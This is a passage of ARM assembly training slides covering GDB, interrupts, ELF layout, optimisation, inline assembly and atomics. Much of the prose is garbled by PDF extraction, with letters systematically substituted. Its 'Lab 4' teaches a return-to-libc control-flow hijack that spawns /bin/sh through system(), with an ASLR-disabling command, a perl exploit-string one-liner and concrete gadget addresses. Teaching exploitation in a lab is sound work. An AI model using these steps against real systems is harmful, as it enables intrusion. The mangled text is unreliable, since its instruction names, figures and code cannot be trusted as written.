Allows conLrolllng sysLem wlde sengs such as:
Mode (A8M/1humb) for excepuons
8ase address for excepuon vecLor Lable
noL fully emulaLed ln kvm/qemu
ulerenL for dlerenL processor proles
ConLrols excepuon handllng congurauons
WheLher excepuons should be handled ln A8M sLaLe
or 1humb sLaLe
131
SC1L8 8eglsLer
1hese sengs are only avallable on CorLex-8
and noL on any oLhers
SC1L8.uZ = 0 means a ulvlde-by-Zero reLurns zero
resulL
SC1L8.uZ = 1 means a ulvlde-by-Zero generaLes
and undened lnsLrucuon excepuon
lL blL glves lnsLrucuon endlanness as lmplemenLed
and ls 8LAu CnL?
132
Cnu uebugger (Cu8) lnLro
1he Cnu debugger ls a command llne
debugglng Lool
A graphlcal fronLend ls also avallable called
ddd
133
Cnu uebugger (Cu8) lnLro
SLarL gdb uslng:
gdb <blnary>
ass lnlual commands for gdb Lhrough a le
gdb <blnary> -x <lnlulle>
lor help
help
1o sLarL runnlng Lhe program
run or r <argv>
134
Cu8 lnlual commands
Cne posslble seL of lnlual commands:
b maln
run
dlsplay/10l pc
dlsplay/x r0
dlsplay/x r1
dlsplay/x r2
dlsplay/x r3
dlsplay/x r4
dlsplay/x r3
dlsplay/x r6
dlsplay/x r7
dlsplay/x r11
dlsplay/32xw sp
dlsplay/32xw cpsr
dlsplay/formaL sLrlng - prlnLs Lhe expresslon followlng
Lhe command every ume debugger sLops

formaL sLrlng lnclude Lwo Lhlngs:
CounL - repeaL specled number of slze elemenLs
lormaL - formaL of how whaLever ls dlsplayed

x (hexadeclmal), o(ocLal), d(declmal), u(unslgned
declmal), L(blnary), f(oaL), a(address), l(lnsLrucuon), c
(char) and s(sLrlng).

Slze leuers are b(byLe), h(halfword), w(word), g(glanL, 8
byLes).

1hese commands can be enLered lnLo Lhe lnlL le, and
helps Lo see Lhe values ln Lhe reglsLers aer execuung
each sLaLemenL or seL of sLaLemenLs.
133
Cu8 8reakpolnLs
1o puL breakpolnLs (sLop execuuon on a cerLaln llne)
b <funcuon name>
b <lnsLrucuon address>
b <lename:llne number>
b <llne number>
1o show breakpolnLs
lnfo b
1o remove breakpolnLs
clear <funcuon name>
clear <lnsLrucuon address>
clear <lename:llne number>
clear <llne number>
136
Cu8 examlnlng varlables/memory
Slmllar Lo dlsplay, Lo look aL conLenLs of
memory
use examlne" or x" command
x/32xw <memory locauon> Lo see memory conLenLs
aL memory locauon, showlng 32 hexadeclmal words
x/3s <memory locauon> Lo show 3 sLrlngs (null
LermlnaLed) aL a parucular memory locauon
x/10l <memory locauon> Lo show 10 lnsLrucuons aL
parucular memory locauon

137
Cu8 dlsassembly & llsung Lhlngs
Can see dlsassembly lf complled wlLh gdb
symbols opuon ln gcc (-ggdb)
dlsass <funcuon name>
Can see breakpolnLs
lnfo breakpolnLs
Can see reglsLers
lnfo reg
138
Cu8 sLepplng
1o sLep one lnsLrucuon
sLepl or sl
1o conunue ull nexL breakpolnL
Conunue or c
1o see backLrace
backLrace or bL
139
Lab 2
use of gdb and your knowledge of A8M assembly
Lo sLop ur. Lvll
gdb -x <lnlulle> bomb (Can opuonally speclfy lnlual
commands le uslng -x)
b explodebomb() (breakpolnL aL explodebomb)
dlsass phase1 (Lo see phase1 code)
lnfo reg Lo see all reglsLers
llnd Lhe rlghL lnpuLs Lo defuse lL
Cu8 cheaL sheeL on /home/arm/ueskLop
Shl + gup Lo scroll up and Shl + guown Lo
scroll down

140
!"# C &"'( %
141
ConLrol llow operauons (1able A4-1)
J59-)/*>75 !.9*),8>75 K.15,5?
8 <label> 8ranch Lo label C = &label
8L <label> 8ranch Lo label wlLh llnk reglsLer L8 = C+4
C = &label
8Lx <8m or
lmm>
8ranch exchange wlLh llnk reglsLer L8 = & of lnsLr. aer 8Lx lnsLr.
C = 8m & 0xlllllllL
1 blL = 8m & 1
8x <8m or
lmm>
8ranch exchange L8 = & of lnsLr. aer 8Lx lnsLr.
C = 8m & 0xlllllllL
1 blL = 8m & 1
Source: hup://www.slldeshare.neL/guesL36d1b781/arm-fundamenLals
142
ConLrol llow operauons (1able A4-1)
J59-)/*>75 !.9*),8>75 (+/2: 27<.
)15?.
"'K 27<.
)15?.
8 <label> 8ranch Lo LargeL address +/- 16 M8 +/- 32 M8
8L, 8Lx <lmm> Call a subrouune
Call a subrouune, change lnsLrucuon seL
+/- 16 M8 +/- 32 M8
8Lx <reg> Call a subrouune, !"#!$%&&' change
lnsLrucuon seL
Any Any
8x 8ranch Lo LargeL address, change
lnsLrucuon seL
Any Any
C8Z Compare and 8ranch on Zero (16-blL)
ermlued oseLs are even from 0 - 126
+4 Lo +130
byLes
uoes noL exlsL
C8nZ Compare and 8ranch on nonzero (16-blL)
ermlued oseLs are even from 0 - 126
+4 Lo +130
byLes
uoes noL exlsL
188 1able 8ranch (byLe oseLs) (32-blL) 0-310 byLes uoes noL exlsL
18P 1able 8ranch (halfword oseLs) (32-blL) 0-131070
byLes
uoes noL exlsL
143
More Lu8/S18 lnsLrucuons
Lu88 8d, [8m] - load byLe aL memory address ln 8m
lnLo 8d
S188 8d, [8m] - sLore byLe from 8d lnLo memory
address ln 8m
Lu8P 8d, [8m] - load halfword aL memory address ln
8m lnLo 8d
S18P 8d, [8m] - sLore halfword aL memory address ln
8m lnLo 8d
Lu8S8 8d, [8m] - load slgned byLe aL memory address
ln 8m lnLo 8d (slgn exLend Lo 32 blLs)
Lu8SP 8d, [8m] - load slgned half-word aL memory
address ln 8m lnLo 8d (slgn exLend Lo 32 blLs)
144
CLher Mlsc." lnsLrucuons - PlnLs
Lu, LuW [<reg>, <lmm>] - reload daLa from
memory aL address ln <reg> wlLh oseL of <lmm>
Ll [<reg>, <lmm>] - reload lnsLrucuons from
memory
uM8 - uaLa memory barrler ensures order of
memory operauons
uS8 - uaLa Synchronlzauon barrler ensures
compleuon of memory access operauon
lS8 -lnsLrucuon Synchronlzauon barrler ushes
plpellne
143
More Mlsc. lnsLrucuons
SL1Lnu 8L/LL - SeLs Lhe endlanness Lo 8lg
Lndlan or Llule Lndlan for memory access
(only applles Lo daLa)
S8SuA|u8|lA|l8 - Save 8eLurn SLaLe saves
Lhe L8 and SS8 of one mode lnLo Lhe sLack
polnLer of anoLher mode
146
8anked 8eglsLers
r0
r1
r2
r3
r4
r3
r6
r7
r8
r9
r10
r11 (l)
r12 (l)
r13 (S)
r14 (L8)
CS8
r13 (C)
r8
r9
r10
r11
r12
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
r13 (S)
r14 (L8)
SS8
8anked reglsLers are preserved across mode changes.
147
ls umlng lmporLanL?
Source: hup://xkcd.com/612/
148
8x-A9 Memory Map
149 Source: hup://lnfocenLer.arm.com/help/lndex.[sp?Loplc=/com.arm.doc.dul0440b/8ba[lhec.hLml
WaLchdog umer
usually used ln embedded sysLems scenarlos
A hardware umer LhaL hard reseLs Lhe sysLem when lL
reaches zero
up Lo sysLem deslgner Lo make sure counLer does noL
reach zero
1lmer accesslble Lhrough reglsLer
8eseL crlucal code secuons where deadlocks can occur
Source:
hup://www.eeumes.com/dlscusslon/beglnner-s-corner/4023849/lnLroducuon-Lo-
WaLchdog-1lmers
130
lnLerrupLs &
WaLchdog umers
ls lL worLh lL?
MeanL for malnly
81CS
Pelps recover from
lnconslsLenL sLaLe
Powever sysLem
deslgner has Lo
speclfy conslsLenL
sLaLe"
Source:
hup://caLless.ncl.ac.uk/8lsks/19.49.hLml
131
lnLerrupLs lnLroducuon
lnLerrupLs
can be synchronous (soware generaLed)
can be asynchronous (hardware generaLed)
LlLerally lnLerrupL Lhe conLrol ow of Lhe program
CeneraLed when
SysLem power o/reseL
undened lnsLrucuon
non-allgned memory access
non-readable memory access
age faulLs
.
132
lnLerrupL handlers
8eferred Lo as lS8 or lnLerrupL Servlce 8ouune
use masks ln reglsLers Lo enable/dlsable
lnLerrupLs
Secuon ln memory LhaL has addresses Lo lS8s
called an lnLerrupL vecLor Lable (usually
locaLed aL 0x00000000)
Wlre Lhe handler by wrlung code dlrecLly aL
locauon ln memory or roll your own lookup
Lable code and lnserL lnLo vecLor Lable
133
lnLerrupL Wlrlng
R6*.8>75 -48. K7<. \.*-7) "<<).99 &),7),-4
8eseL Supervlsor 0x00000000 1 (hlghesL)
uaLa AborL AborL 0x00000010 2
llC (lasL
lnLerrupL)
llC 0x0000001C 3
l8C (normal
lnLerrupL)
l8C 0x00000018 4
refeLch AborL AborL 0x0000000C 3
Sofware lnLerrupL
(SWl/SvC)
Supervlsor 0x00000008 6
undened
lnsLrucuon
undened 0x00000004 6 (lowesL)
134
lnLerrupL vecLor Lable
unuLllnLu
SWl
8LlL1CP A8C81
uA1A A8C81
8LSL8vLu
l8C
llC
8LSL1
0x00
0x04
0x08
0x0C
0x10
0x14
0x18
0x1C
Lu8 C, C, 100
SWl Pandler Code here.
SWl Pandler
0x6C
0x70
133
CurrenL rogram SLaLus 8eglsLer
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

8

7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
XK7<. LYZFM K7<.
10000 user
10001 llC
10010 l8C
10011 SvC (Supervlsor)
10111 AborL
11011 undened
11111 SysLem
136
lnLerrupL handlers ll
When an excepuon occurs, processor
Coples CS8 lnLo SS8<mode>
Changes CS8 blLs Lo reecL new mode, and (A8M/1humb)
sLaLe
ulsables furLher lnLerrupLs lf approprlaLe
SLores C + 4 (A8M) or C + 2 (1humb) ln L8<mode>
SeLs C Lo address from vecLor Lable correspondlng Lo excepuon
When reLurnlng from an lS8
SysLem developer needs Lo resLore CS8 from SS8<mode>
8esLore C from L8<mode>
8oLh can be done ln one lnsLrucuon MCvS C, L8
137
lnLerrupL handlers lll
When l8C excepuon occurs, only l8Cs are
dlsabled
When llC excepuon occurs, boLh l8Cs and
llCs are dlsabled
Cenerally each excepuon mode's L8 has
prevlous C + 4 (excepL for uaLa aborL
excepuon)
uaLa aborL excepuon mode's L8 has prevlous
C + 8 (A8M & 1humb)
Source: hup://www.csle.ncLu.edu.Lw/~w[Lsal/LmbeddedSysLemueslgn/Ch3-1.pdf
138
Sample l8C Pandler
l8CPandler (A8M mode):
STMFD sp!, {r0-r12,lr}
BL ISR_IRQ @ Go to second level IRQ handler
SUB lr, lr, #4
LDMFD sp!, {r0-r12,lr}^
SUBS pc, lr, #4
139
Sample llC Pandler
llC Pandler
SUB lr, lr, #4
STMFD sp!, {r0-r7,lr}
@ Renable any interrupts needed here
MRS R0, CPSR
CMP R1, #0x00000012 ; Test for IRQ mode
BICNE R0, R0, #0x80 @ Optionally renable IRQs here
@ Handle FIQ event here
LDMFD sp!, {r0-r7,lr}^
SUBS pc, lr, #4
160
SWl (Soware lnLerrupL) handler
wlrlng
MosL hardware dene vecLor Lables lndexed
by excepuon Lype.
SWl handler address usually aL 0x08
As was seen earller, Llnux syscalls use SWl
SWl encodlng allows for 24-blL commenL,
whlch ls generally lgnored
Can be used for dlerenuaung b/w Lypes of
SWl

161
SWl handler wlrlng conLd.
SWI 0x18 -> 0x08 LDR PC, PC, 0x100 -> S_Handler
0x108 STMFD sp!, {r0-r12, lr}
0x10c MOV r1, sp
0x110 LDR r0, [lr, #-4]
0x114 BIC r0, r0, #0xff000000
! BL C_SWI_HANDLER
! LDMFD sp!, {r0-r12, lr};
! MOVS pc, lr


void C_SWI_Handler(int swi_num, !)
{
switch(swi_num) {
case 0x00: service_SWI1();
case 0x01: service_SWI2();
!
}
}
SWl lnsLrucuon ls sLored ln
L8<Mode>

Lncoded wlLh Lhe 24-blL value

Mask LhaL 24-blL value lnLo r0
8ranch Lo SWl Pandler

8un Lhe approprlaLe handler
based on LhaL value
162
Lab 3
lnLerrupLs lab
Lmulaung a serlal drlver uslng uA81
ln order Lo see someLhlng lnLeresung ln Lhls
lab, we Lake Lhe lnpuL characLer and add 1 Lo
lL
Modlfy lnLer.c and vecLors.S les
Add one or more llnes where lL says
/ Auu CCuL PL8L /
163
lnLer.c
void __attribute__((interrupt)) irq_handler() {
/* echo the received character + 1 */
UART0_DR = UART0_DR + 1;
}
164
vecLors.S
reset_handler:
/* set Supervisor stack */
LDR sp, =stack_top
/* copy vector table to address 0 */
BL copy_vectors
/* get Program Status Register */
MRS r0, cpsr
/* go in IRQ mode */
BIC r1, r0, #0x1F
ORR r1, r1, #0x12
MSR cpsr, r1
/* set IRQ stack */
LDR sp, =irq_stack_top
/* Enable IRQs */
BIC r0, r0, #0x80
/* go back in Supervisor mode */
MSR cpsr, r0
/* jump to main */
BL main
B .
163
CurrenL rogram SLaLus 8eglsLer
3
1

n
3
0

Z
2
9

C
2
8

v
2
7

C
2
6

2
3

2
4

2
3

2
2

2
1

2
0

1
9

1
8

1
7

1
6

1
3

1
4

1
3

1
2

1
1

1
0

9

8

7

l
6

l
3

1
4


3

M
2

C
1

u
0

L
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
XK7<. LYZFM K7<.
10000 user
10001 llC
10010 l8C
10011 SvC (Supervlsor)
10111 AborL
11011 undened
11111 SysLem
166
A8M LLl lormaL
RQ0 ].1<.)
.lnlL
.LexL
.rodaLa
.daLa
.bss
.symLab
.rel.LexL
.rel.daLa
.debug
.llne
.sLrLab
O.*>75 +.1<.) -1:3.
8ead-only Code segmenL
8ead/wrlLe uaLa segmenL
Symbol Lable and debugglng
lnfo nC1 loaded lnLo
memory
167
A8M LLl lormaL
.LexL - has your code
.rodaLa - has consLanLs and read-only daLa
.daLa - has your global and sLauc varlables
.bss - conLalns unlnluallzed varlables
Peap sLarLs aer .bss secuon ln memory
grows Lowards lncreaslng memory
SLack sLarLs aL Lhe opposlLe end and grows
Loward heap
168
A8M LLl lormaL
O.*>75 !.9*),8>75
.LexL rogram lnsLrucuons and daLa
.rodaLa 8ead-only daLa llke formaL sLrlngs for prlnu
.daLa lnluallzed global daLa
.bss un-lnluallzed global daLa
.symLab 1hls secuon has Lhe symbol lnformauon such as global
varlables and funcuons
.rel.LexL LlsL of locauons ln Lhe .LexL LhaL llnker needs Lo deLermlne
when comblnlng .o les
.rel.daLa 8elocauon lnformauon for global varlables
.debug uebugglng lnformauons (such as Lhe one Lurned on wlLh gcc
-g)
.llne Mapplng b/w llne numbers ln C program and machlne code
(debug)
.sLrLab SLrlng Lable for symbols ln .symLab and .debug
169
Pow Lo perform a conLrol hl[ack
We can wrlLe Lo Lhe S glven a vulnerable
funcuon (sLrcpy or memcpy wlLh no bounds
check lnLo local varlable)
A1CS as we saw requlres args Lo be passed ln
Lhrough 80-83
lor popplng a shell we can make a sysLem()
wlLh argumenLs conLalnlng sLrlng /bln/sh"
170
A8M now execuung rsL lnsLrucuon ln
one()
.
maln() frame"
Cne() frame"
undened
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

Local varlables
Caller-save reglsLers
Args Lo Cne()
Callee-save reglsLers are pushed
onLo sLack uslng S1Mlu sp,
reglsLers along wlLh 814 (L8)

And 811/87/83(l) can also be
updaLed relauve Lo (813)S
Callee-save reglsLers
L8 = Cmaln
171
lLzhak Avraham's approach
use a reLurn Lo llbc sLyle meLhod
We can overwrlLe L8 ln sLack
8eLurn Lo a funcuon LhaL conLalns lnsLrucuons
Lo pop values from sLack lnLo 80 (conLalnlng
our /bln/sh" address) and anoLher L8 ln sLack
polnung Lo sysLem()
1he above funcuon LhaL conLalns Lhls code for
us ls erand48()
172
Source: hups://medla.blackhaL.com/bh-dc-11/Avraham/8lackPaLuC2011Avraham-opplngAndrolduevlces-Slldes.pdf
SLack
J
5
*
)
.
1
9
,
5
?

K
.
2
7
)
4

olnL Lo erand48()+x
80: olnL Lo /bln/sh Lu8u 80, 81
Su8 S, 12
C C, L8
81: Can be [unk
olnL Lo sysLem()
!unk value
uL /bln/sh" sLrlng
here
erand48()+x:
8uf[3]
8uf[3]
8eglsLer val
Callee saved reglsLer(s)
L8
80 for sysLem()
81
!unk
&sysLem()
sLrlng
173
Lab 4
ConLrol ow hl[ack lab
Cb[ecuve: CeL a shell uslng reLurn Lo llbc sLyle
auack
lLzhak Avraham's paper lncluded
CLher useful llnks:
hup://research.shell-sLorm.org/les/research-4-
en.php
174
Lab 4 noLes
lMC81An1:
echo 0 > /proc/sys/kernel/randomlzevaspace
ln gdb you can breakpolnL and run
p sLr // CeLs address of /bln/sh sLrlng
p erand48 // CeLs address of erand48 meLhod
p sysLem // CeLs address of Lhe sysLem meLhod
8emember Lo add 1 Lo Lhe erand48 address (Lhumb2
lnsLrucuon seL requlres LS8 Lo be 1)
1o verlfy run x/s <enLer address from prevlous>
173
Lab 4 noLes conLd.
1o cra your explolL sLrlng run:
perl -e 'prlnL A8Cu"x3 . xA8xCuxuLxLl" .
LlCP"' > soluuon
gdb ./boverow
b sLage1" or whaLever ls ln your lnlL commands
le
run caL soluuon
176
osslble Soluuon
My erand48+x locaLed aL 0x76l28L36 + 1
My sysLem locaLed aL 0x76l2u768 +1
My /bln/sh" passed ln Lhrough sLrlng locaLed
aL 0x7Llll6L8
As per Lhe sLack dlagram l need A8Cu"x3 +
0x378Ll276 + 0xL8l6ll7L + LlCP" + l!kL" +
0x69u7l276 + /bln/sh"
177
!"# C &"'( %^_
178
Code Cpumlzauon
Ck we can wrlLe assembly and C programs
Powever, do we know whaL really happens Lo
LhaL C program once we glve lL Lo Lhe
compller?
We assume cerLaln Lhlngs happen for us
lor example, dead code ls removed
Powever wlLh greaL compllers comes greaL
responslblllLy.
179
CCC Cpumlzauons
Can opumlze for code slze, memory usage
usually compller knows besL, however can also
be nC1 whaL sysLem deslgner has ln mlnd.
We can help compller declde
lor more evll C, checkouL
hup://www.sLelke.com/code/useless/evll-c/
int func1(int *a, int *b)
{
*a += *b;
*a += *b;
}
Source: 8ryan, 8., C'Pallaron, u. CompuLer SysLems: A rogrammer's erspecuve"
int func2(int *a, int *b)
{
*a += ((*b)<<1);
}
180
CCC opumlzauons 2
Common sub-expresslon ellmlnauon
uead code removal
use lfdefs helps compller ellmlnaLe dead code
lnducuon varlables & SLrengLh reducuon
Loop unrolllng
lncreases code slze, buL reduces Lhe number of
branches
luncuon lnllnlng
Agaln can reduce number of branches
ln C code, add lnllne before funcuon spec

181
Source: hup://gcc.gnu.org/onllnedocs/
A8M speclc opumlzauons
use of consLanLs uslng barrel shler:
lnsLead of 3x, use (x<<2) + x
use of condluonal execuuon Lo reduce code slze and execuuon
cycles
CounL down loops
Counung upwards produces Auu, CM and 8x lnsLrucuons
Counung downwards produces Su8S & 8CL
use 32-blL daLa Lypes as much as posslble
Avold dlvlslons or remalnder operauon ()
8eglsLer accesses more eclenL Lhan memory accesses
Avold reglsLer spllllng (more parameLers Lhan reglsLers end up ln
memory on sLack)
use pure funcuons when posslble and only lf Lhey do noL have slde
eecLs
182
A8M speclc opumlzauon: CounL
down loops
int checksum(int *data)
{
unsigned i;
int sum = 0;

for(i=0; i<64; i++)
sum += *data++;

return sum;
}

int checksum(int *data)
{
unsigned i;
int sum = 0;

for(i=63; i>=0; i--)
sum += *data++;

return sum;
}
MOV r2, r0 ; r2=data
MOV r0 #0 ; sum=0
MOV r2, r0 ; r2=data
r0, MOV r1, #0; i=0
L1 LDR r3,[r2],#4 ; r3=*(data++)
ADD r1, r1, #1 ; i=i+1
CMP r1, 0x40 ; cmp r1, 64
ADD r0, r3, r0 ; sum +=r3
BCC L1 ; if i < 64, goto L1
MOV pc, lr ; return sum
MOV r2, r0 ; r2=data
MOV r0, #0 ; sum=0
MOV r1, #0x3f ; i=63
L1 LDR r3,[r2],#4 ; r3=*(data++)
ADD r0, r3, r0 ; sum +=r3
SUBS r1, r1, #1 ; i--, set flags
BGE L1 ; if i >= 0, goto L1
MOV pc, lr ; return sum
183
A8M speclc opumlzauon: 32-blL daLa
Lypes
void t3(void)
{
char c;
int x=0;
for(c=0;c<63;c++)
x++;
}

void t4(void)
{
int c;
int x=0;
for(c=0;c<63;c++)
x++;
}
MOV r0,#0 ; x=0
MOV r1,#0 ; c=0
L1 CMP r1,#0x3f ; cmp c with 63
BCS L2 ; if c>= 63, goto L2
ADD r0,r0,#1 ; x++;
ADD r1,r1,#1 ; c++
AND r1,r1,#0xff ; c=(char) r1
B L1 ; branch to L1
L2 MOV pc,r14
184
A8M speclc opumlzauon: funcuon
calls
void test(int x) {
return(square(x*x) + square(x*x));
}
void test(int x) {
return(2*square(x*x));
}
The following case shows square() has a side effect:
int square(int x)
{
counter++; /* counter is a global variable */
return(x*x);
}

If no side effect, declare as pure function for compiler to optimize
__pure int square(int x);

183
A8M speclc opumlzauon: code
allgnmenL
SLrucLure/Code allgnmenL
12 byLes vs. 8 byLes
Could use packed keyword Lo remove paddlng
Powever A8M emulaLes unallgned load/sLore by
uslng several allgned byLe access (lneclenL)
struct
{
char a;
int b;
char c;
short d;
}
struct
{
char a;
char c;
short d;
int b;
}
186
!"# C &"'( C
187
Wrlung assembly ln whaLever your
edlLor may be.
Source: hup://xkcd.com/378/
188
lnllne assembly (uslng buuerles)
lollows Lhe followlng form:
asm(code : output operand list : input operand list: clobber list);
1he lnpuL/ouLpuL operand llsL lncludes c and
assembly varlables
Lxample:
/* Rotating bits example */
asm("mov %[result], %[value], ror #1" : [result] "=r" (y) : [value] "r" (x));
=r"
r ls referred Lo as a consLralnL
= ls referred Lo as a modler
Source: hup://www.eLhernuL.de/en/documenLs/arm-lnllne-asm.hLml
189
osslble consLralnLs for lnllne
assembly
D759-)1,5- `91?. ,5 "'K 9-1-. `91?. ,5 (+/2: 9-1-.
F Floating point registers f0..f7 Not Available
H Not Available Registers r8..r15
G Immediate floating point constant Not available
H Same a G, but negated Not available
I
Immediate value in data processing instructions
e.g. ORR R0, R0, #operand
Constant in the range 0 .. 255
e.g. SWI operand
J
Indexing constants -4095 .. 4095
e.g. LDR R1, [PC, #operand]
Constant in the range -255 .. -1
e.g. SUB R0, R0, #operand
K Same as I, but inverted Same as I, but shifted
L Same as I, but negated
Constant in the range -7 .. 7
e.g. SUB R0, R1, #operand
l Same as r
Registers r0..r7
e.g. PUSH operand
M
Constant in the range of 0 .. 32 or a power of 2
e.g. MOV R2, R1, ROR #operand
Constant that is a multiple of 4 in the range of 0 .. 1020
e.g. ADD R0, SP, #operand
m Any valid memory address
N Not available
Constant in the range of 0 .. 31
e.g. LSL R0, R1, #operand
O Not available
Constant that is a multiple of 4 in the range of -508 .. 508
e.g. ADD SP, #operand
r
General register r0 .. r15
e.g. SUB operand1, operand2, operand3
Not available
w Vector floating point registers s0 .. s31 Not available
X Any operand
Source: hup://www.eLhernuL.de/en/documenLs/arm-lnllne-asm.hLml
190
Modlers
= ls wrlLe-only operand, usually for all ouLpuL
operands
+ ls read-wrlLe operand, musL be llsLed as an
ouLpuL operand
& ls a reglsLer LhaL should be used for ouLpuL
only
Source: hup://www.eLhernuL.de/en/documenLs/arm-lnllne-asm.hLml
191
Lxample 6.c
0000838c <main>:
838c: b590 push {r4, r7, lr}
838e: b085 sub sp, #20
8390: af00 add r7, sp, #0
8392: f04f 0306 mov.w r3, #6
8396: 60fb str r3, [r7, #12]
8398: f3ef 8400 mrs r4, CPSR
839c: 60bc str r4, [r7, #8]
839e: 68fa ldr r2, [r7, #12]
83a0: f243 535d movw r3, #13661 ; 0x355d
83a4: f6cf 73fd movt r3, #65533 ; 0xfffd
83a8: 18d3 adds r3, r2, r3
83aa: 607b str r3, [r7, #4]
83ac: f3ef 8400 mrs r4, CPSR
83b0: 603c str r4, [r7, #0]
83b2: f248 4344 movw r3, #33860 ; 0x8444
83b6: f2c0 0300 movt r3, #0
83ba: 4618 mov r0, r3
83bc: 6879 ldr r1, [r7, #4]
...
int main(void)
{
int a, b;
a = 6;
asm(mrs %[result], apsr: [result] =r (x) : );
b = a - 182947;
asm(mrs %[result], apsr: [result] =r (y) : );
printf("a's negatory is %d\n", b);

return 0;
}
Before the subtraction operation

APSR = 0x60000010

After the subtraction operation

APSR = 0x80000010
192
Wrlung C funcuons ln assembly
ln C le, say lL ls called lsawesome.c, declare Lhe funcuon:
extern int mywork(int arg1, char arg2, !);
ln assembly lnclude
.syntax unified @ For UAL
.arch armv7-a
.text
.align 2
.thumb
.thumb_func
.global mywork
.type mywork, function
@ CODE HERE
.size mywork, .-mywork
.end
ln make le use gcc -c -o mywork.o mywork.s
llnally gcc -o awesomeprogram mywork.o lsawesome.o
Source: hup://omappedla.org/wlkl/WrlungA8MAssembly
193
LvenL handllng
WlL - WalL for LvenL, wakes up when elLher of
followlng happens:
SLv ls called
A physlcal l8C lnLerrupL
A physlcal llC lnLerrupL
A physlcal asynchronous aborL
SLv - Send LvenL
See 8 1.8.13 ln manual for more deLalls
used wlLh spln-locks
194
Lxcluslve lnsLrucuons
Lu8Lx8|u|P <reg1> <8m>
Load excluslve from 8m lnLo <reg1>
S18Lx8|u|P <reg1> <reg2> <8m>
SLore excluslve from <reg2> lnLo <8m> and wrlLe Lo <reg1>
wlLh 0 lf successful or 1 lf unsuccessful
8oLh lnLroduced slnce A8Mv6
SW & SW8 - used on A8Mv6 and earller now
deprecaLed
lL ls read-locked-wrlLe
Powever does noL allow for operauons beLween Lhe read
lock and wrlLe
AL LhaL polnL you use Lu8Lx/S18Lx
193
Lxcluslve lnsLrucuons conLd.
no memory references allowed beLween Lu8Lx
and S18Lx lnsLrucuons
Powever aer sLarung excluslve access uslng
Lu8Lx, can dlsengage uslng CL8Lx lnsLrucuon
use of uM8 (uaLa Memory 8arrler) ln beLween
excluslve accesses
Lnsures correcL orderlng of memory accesses
Lnsures all expllclL memory accesses nlsh or
compleLe before expllclL memory access aer Lhe
uM8 lnsLrucuon
196
Lab 3
ALomlc lab
lmplemenL a slmple muLex ln assembly wlLh
Lhreads ln C
Clven code LhaL uses llbpLhread Lo do
Lhreadlng
CreaLes Lwo Lhreads whlch use dosomeLhlng()
Lo do work

197
Lab 3
seudocode for muLexlock:
Load locked value lnLo a Lemp reglsLer
Loop:
Lu8Lx from [r0] and *7281). Lo unlocked value
lf [r0] conLenLs have Lhe unlocked value
S18Lx value ln Lemp varlable lnLo [r0]
lf noL successful goLo loop
1o load locked value, you can use
ldr r2, =locked
seudocode for MuLex unlock
Load =unlocked value lnLo a Lemp reglsLer
SLore value from Lemp reglsLer lnLo [r0]
198
osslble soluuon
.equ locked, 1
.equ unlocked, 0

.global lock_mutex
.type lock_mutex, function
lock_mutex:
ldr r1, =locked
.L1:
ldrex r2, [r0]
cmp r2, #0
strexeq r2, r1, [r0]
cmpeq r2, #0
bne .L1
bx lr

.size lock_mutex, .-lock_mutex

@.align 2
@.thumb
@.thumb_func

.global unlock_mutex
.type unlock_mutex, function
unlock_mutex:
ldr r1, =unlocked
str r1, [r0]
bx lr
.size unlock_mutex, .-unlock_mutex
199
Assembly on lhone
lor lhone:
Can use lnllne assembly as we saw above ln
Cb[ecuve-C code
lnclude Lhe assembly source le ln xCode
Pave noL experlmenLed wlLh xcode and assembly
lhone A8l Llnk:
hup://developer.apple.com/llbrary/los/
documenLauon/xcode/ConcepLual/
lhoneCSA8l8eference/lhoneCSA8l8eference.pdf
200
Source:
Assembly on Androld
lor Androld:
need Lo use Androld nauve uevelopmenL klL (nuk)
WrlLe a sLub code ln C LhaL calls assembly meLhod and
uses !nl Lypes
WrlLe a make le or copy a LemplaLe and lnclude Lhe
new assembly le and Lhe sLub-code C le
use nuk Lool ndk-bulld Lo bulld
ln Androld appllcauon declare Lhe meLhod uslng same
slgnaLure uslng !ava Lypes and mark as 51>W.
publlc 51>W. lnL myasmfunc(lnL param1)
Also load Lhe assembly [nl-llbrary
SysLem.loadllbrary(llbrary-name-here")
201
Source:
hup://www.eggwall.com/2011/09/androld-arm-assembly-calllng-assembly.hLml
Summary
We covered:
Pow booL ls handled on A8M plauorms
Some mechanlcs of A8M assembly and how Lo debug
lL uslng Cu8
Pow programs are converLed Lo assembly and run
lncludlng A1CS along wlLh conLrol ow hl[ack
vulnerablllues
CLher feaLures of A8M plauorms lncludlng lnLerrupLs
and aLomlc lnsLrucuons
Pow Lo wrlLe lnllne assembly ln C and how Lo wrlLe C
funcuons ln assembly (for use ln C source)

202
useful llnks
A8M CCC lnllne Assembler cookbook
hup://www.eLhernuL.de/en/documenLs/arm-lnllne-asm.hLml
Wrlung A8M assembly
hup://omappedla.org/wlkl/WrlungA8MAssembly
A8M archlLecLure dlagrams:
hup://www.eng.auburn.edu/~agrawvd/CCu8SL/L6200lall08/
CLASS1ALkS/armcores.ppL
Pow Lo bulld Lhe emulaLor:
hups://developer.mozllla.org/en/ueveloperCulde/
vlrLualA8MLlnuxenvlronmenL
CCC manual (A8M opumlzauon opuons):
hup://gcc.gnu.org/onllnedocs/gcc/A8M-Cpuons.hLml
203

You might also like